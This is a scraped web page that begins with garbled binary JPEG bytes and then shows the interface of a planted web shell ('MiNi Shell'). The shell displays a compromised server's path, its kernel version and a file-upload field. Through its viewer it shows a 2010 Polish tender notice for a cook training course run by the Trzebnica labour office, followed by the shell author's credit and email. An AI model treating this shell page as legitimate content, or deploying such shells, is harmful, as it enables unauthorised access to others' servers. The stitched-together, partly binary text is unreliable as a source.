JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100506/125704-N-2010.html

<p class="kh_header"><b>Trzebnica: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia w kierunku  Kucharz małej gastronomii z elementami cateringu dla 10 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Trzebnicy</b><br>
<b>Numer ogłoszenia: 125704 - 2010; data zamieszczenia: 06.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Trzebnicy , ul. Ignacego Daszyńskiego 44-46, 55-100 Trzebnica, woj. dolnośląskie, tel. 0-71 312-11-54, 387-05-65, faks 0-71 312-11-54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praca.trzebnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia w kierunku  Kucharz małej gastronomii z elementami cateringu dla 10 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Trzebnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szkolenie ma na celu przygotowanie do pracy na stanowisku kucharza małej gastronomii, pomocnika kucharza małej gastronomii lub do prowadzenia działalności gastronomicznej m.in. 
w barach szybkiej obsługi, punktach małej gastronomii, restauracjach, stołówkach, firmach cateringowych oraz przedsiębiorstwach zajmujących się produkcją wyrobów i półproduktów kulinarnych oraz spożywczych.

Program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministerstwo Pracy 
i Polityki Społecznej znajdujących się na stronie internetowej: www.standardyiszkolenia.praca.gov.pl
Szkolenie ma składać się z części teoretycznej i praktycznej i obejmować m.in. :
­	organizowanie i porządkowanie własnego stanowiska pracy w małej gastronomii zgodnie 
z zasadami ergonomii, bezpieczeństwa i higieny pracy, ochrony p.poż
­	podstawowe zasady higieny- HACCP
­	przygotowanie materiałów do produkcji podstawowego asortymentu potraw i napojów 
w małej gastronomii
­	sporządzanie podstawowego asortymentu potraw i napojów w małej gastronomii
­	dobieranie i posługiwanie się sprzętem oraz obsługiwanie maszyn i urządzeń w małej gastronomii
­	przyjmowanie, przechowywanie, wydawanie produktów spożywczych, półproduktów i innych artykułów w małej gastronomii
­	ocenianie jakościowe surowców, półproduktów i potraw w małej gastronomii
­	planowanie posiłków i układanie prostego menu w małej gastronomii 
­	porcjowanie, dekorowanie i ekspedycja potraw w małej gastronomii 
­	catering
­	obsługa kasy fiskalnej 
­	elementy przedsiębiorczości - sprawdzenie predyspozycji do bycia przedsiębiorcą 
i zachęcenie do rozpoczęcia własnej działalności gospodarczej - minimum 7 godzin
­	zajęcia aktywizujące do podjęcia pracy w kierunku ukończonego szkolenia - minimum 7 godzin
Zamawiający nie zakłada praktyki w punktach małej gastronomii, restauracjach, stołówkach, firmach cateringowych, itp. 
Zajęcia praktyczne powinny odbyć się w warunkach symulowanych, mogą obejmować wizytacje punktów gastronomicznych, kuchni itd. 
Program szkolenia ogólnie powinien zawierać 200 godzin.
Wykonawca przygotuje Program szkolenia zgodnie z załącznikiem nr 4.
Egzamin końcowy musi być integralną częścią programu oraz wchodzić w skład ilości godzin przewidzianych programem. Egzamin końcowy musi być ujęty w Programie kursu w pozycji Plan nauczania z uwzględnieniem ilości godzin przewidzianych na ten egzamin oraz w Szczegółowym harmonogramie kursu z uwzględnieniem daty tego egzaminu i ilości godzin przewidzianych na egzamin.

Najpóźniej w dniu rozpoczęcia zajęć Wykonawca przedstawi Zamawiającemu harmonogram szkolenia zawierający informacje zawarte we wzorze Załącznika nr  4a 
Na pierwszych zajęciach Wykonawca przedstawi każdemu uczestnikowi szkolenia program szkolenia i harmonogram szkolenia. Wykonawca zapewni każdej osobie szkolonej rozkład zajęć odpowiadający harmonogramowi kursu. 

Szkolenie powinno zakończyć się egzaminem, a nabyte umiejętności powinny być potwierdzone zaświadczeniem o ukończeniu szkolenia zgodne z rozporządzeniem Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006r. nr 31 poz. 216).
Wykonawca zobowiązany będzie po zakończeniu szkolenia wydać uczestnikom szkolenia zaświadczenia o jego ukończeniu, zgodnie z wymogami określonymi w rozporządzeniu Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216) i certyfikaty z oznakowaniem unijnym, logo EFS i logo PO KL oraz nazwą projektu.

Szkolenie powinno być przeprowadzone w okresie: czerwiec - lipiec br. Zamawiający zakłada rozpoczęcie szkolenia od 1 czerwca 2010r. 

Szkolenie ma być przeprowadzone w Trzebnicy lub w innej miejscowości z zagwarantowaniem codziennego dojazdu z Trzebnicy do miejsca szkolenia i z powrotem, przy czym odległość między Trzebnicą a miejscem szkolenia  czasowo nie może przekroczyć jednej godziny w jedną stronę. Koszt dojazdu uczestników na szkolenie ma być ujęty w preliminarzu kosztów szkolenia.

Szkolenie ma odbywać się w sali dostosowanej do wielkości grupy i z osobnymi miejscami dla każdego uczestnika szkolenia, z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką zgodnie z obowiązującymi przepisami BHP, także z zapewnieniem wyposażenia sali w odpowiedni sprzęt techniczny (tzn. rzutniki, tablice itp.) oraz sprzęt i materiały niezbędne do przeprowadzenia zajęć w warunkach symulowanych z wykorzystaniem  narzędzi i sprzętu zmechanizowanego.

W trakcie trwania szkolenia (najpóźniej w połowie) oraz po jego zakończeniu Wykonawca przeprowadzi wśród wszystkich uczestników ocenę szkolenia za pomocą formularza ankiety oceniającej, będącym załącznikiem do programu.

W okresie przeprowadzenia szkolenia Wykonawca zobowiązany będzie w miejscu szkolenia do umieszczenia informacji o szkoleniu z oznakowaniem unijnym oraz nazwą projektu współfinansowanego ze środków EFS. 

Zamawiający wymaga, aby w przypadku korzystania z wynajmowanego ( dzierżawionego) lokalu lub sprzętu podmiot ubiegający się o udzielenie zamówienia załączył do  oferty informację 
o podstawie dysponowania tymi zasobami.
Wykonawca zapewni uczestnikom szkolenia odpowiednie materiały szkoleniowe, skrypty, zeszyty, materiały piśmiennicze, itp. z oznakowaniem unijnym oraz nazwą projektu, które po zakończeniu szkolenia przejdą w posiadanie absolwentów szkolenia.

Szkolenie ma być realizowane według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 ustawy z dnia 20 kwietnia 2004 r. 
o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. nr 69, poz. 415 z późn. zm.). Godzina  zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne  liczące 45 min oraz przerwę, liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny. 
Zamawiający zakłada przeprowadzenie zajęć szkolenia między godzinami 8.00 - 16.00, średnio po 7 godzin zegarowych dziennie. Godziny rozpoczęcia i zakończenia zajęć powinny być dostosowane do możliwości dojazdu osób bezrobotnych. Szkolenie powinno odbywać się w dni od poniedziałku do piątku.  Maksymalna ilość dni szkolenia - 30

Wykonawca zobowiązany będzie do prowadzenia indywidualnych list obecności uczestników szkolenia z podziałem na dni i godziny zegarowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, gdy przedstawi aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w przypadku osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych. Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek gdy wykaże: że należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności szkoleniowej jest krótszy - w tym okresie usługi szkoleniowe odpowiadające przedmiotowi lub jego części niniejszego zamówienia, tj. co najmniej 2  szkoleń grupowych lub dla ogółem minimum 30 osób  z  zakresu gastronomii tj. kucharza i/lub pomocnika kucharza i/lub kelnera i/lub barmana i/lub cateringu w wymiarze nie krótszym niż 30 godzin. Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, gdy wskaże miejsce szkolenia dostosowane ilością i jakością pomieszczeń oraz wyposażone w sprzęt i pomoce dydaktyczne odpowiednio do potrzeb szkolenia, z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki. Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek gdy wskaże kadrę dydaktyczną, składającą się z co najmniej 2 osób, przy czym każda z nich musi posiadać doświadczenie w realizacji co najmniej 3 szkoleń w zakresie tematycznym odpowiadającym swoim zakresem przedmiotowi zamówienia lub w przypadku nauczycieli roczny staż pracy dydaktycznej związanej z przedmiotem zamówienia. Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą spełnia / nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony formularz oferty - Załącznik nr 3.  specyfikacji istotnych warunków zamówienia),
b)	program kursu (załącznik  nr 4 specyfikacji istotnych warunków zamówienia),
c)	preliminarz kosztów szkolenia (załącznik nr 5  specyfikacji istotnych warunków zamówienia ). 
f)	wpis do Rejestru Instytucji Szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy i potwierdzenie, że wpis został zaktualizowany na rok 2010 (adnotacja na zaświadczeniu dokonana przez WUP lub wydruk ze strony internetowej),

d)	pełnomocnictwo - w przypadku gdy Wykonawcę reprezentuje pełnomocnik - podpisane przez osoby reprezentujące wykonawcę i określające zakres tego pełnomocnictwa
e)	certyfikaty jakości  usług - jeśli Wykonawca takie posiada</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalna jest zmiany umowy dotycząca: 
a)	ilości osób skierowanych na szkolenie, 
b)	terminu realizacji szkolenia, 
c)	miejsca realizacji szkolenia, 
d)	kadry wykładowców
w sytuacjach, gdy zmiana taka wynika z przyczyn niezależnych, których nie można było przewidzieć w chwili podpisania umowy np. sytuacje choroby, pobytu w stacjonarnym zakładzie opieki zdrowotnej, potwierdzonego odpowiednim zaświadczeniem lekarskim na druku ZUS ZLA, zdarzenia losowe, awarie, wypowiedzenie umowy najmu (dzierżawa) sal wykładowych, wypowiedzenie umów dot. świadczenia pracy przez wykładowców, zaistnienia okoliczności niezależnych od Zamawiającego uniemożliwiających rozpoczęcie szkolenia przez maksymalną liczbę osób na skutek nieprzewidzianych okoliczności m.in.: zwolnienia lekarskiego, nie zgłoszenia się po skierowanie, podjęcia pracy przez bezrobotnego w sytuacji, gdy nie ma możliwości skierowania kolejnej osoby. 
Wykonawca jest zobowiązany niezwłocznie zawiadomić pisemnie Zamawiającego o zaistniałej sytuacji i przedstawić propozycję dokonania zmiany. 
W przypadku prośby o zmianę wykładowcy Wykonawca zobowiązany jest przedstawić zastępstwo tej osoby przez osobę o kwalifikacjach zawodowych co najmniej równych co osoba zastępowana. Ponadto Wykonawca będzie zobowiązany przedstawić Zamawiającemu wraz z wnioskiem wypełniony załącznik nr 7 do specyfikacji istotnych warunków zamówienia. 
W przypadku zmiany miejsca szkolenia Wykonawca zobowiązany jest zapewnić warunku lokalowe co najmniej równoważne do poprzednich. Ponadto Wykonawca będzie zobowiązany przedstawić Zamawiającemu wraz z wnioskiem wypełniony załącznik nr 8 do specyfikacji istotnych warunków zamówienia. 
Wszelkie zmiany mogą nastąpić wyłącznie wtedy, gdy Zamawiający wyrazi na nie zgodę. 
Żadna ze zmian nie może wpłynąć na zmianę ceny szkolenia w przeliczeniu na 1 uczestnika.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.praca.trzebnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy 
ul. Daszyńskiego 44-46 
55-100 Trzebnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy 
ul. Daszyńskiego 44-46 
55-100 Trzebnica 
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie będzie współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach projektu systemowego PO KAPITAŁ realizowanego w ramach Priorytetu VI PO KL: Rynek pracy otwarty dla wszystkich, Działanie 6.1: Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3: Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych PO KL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com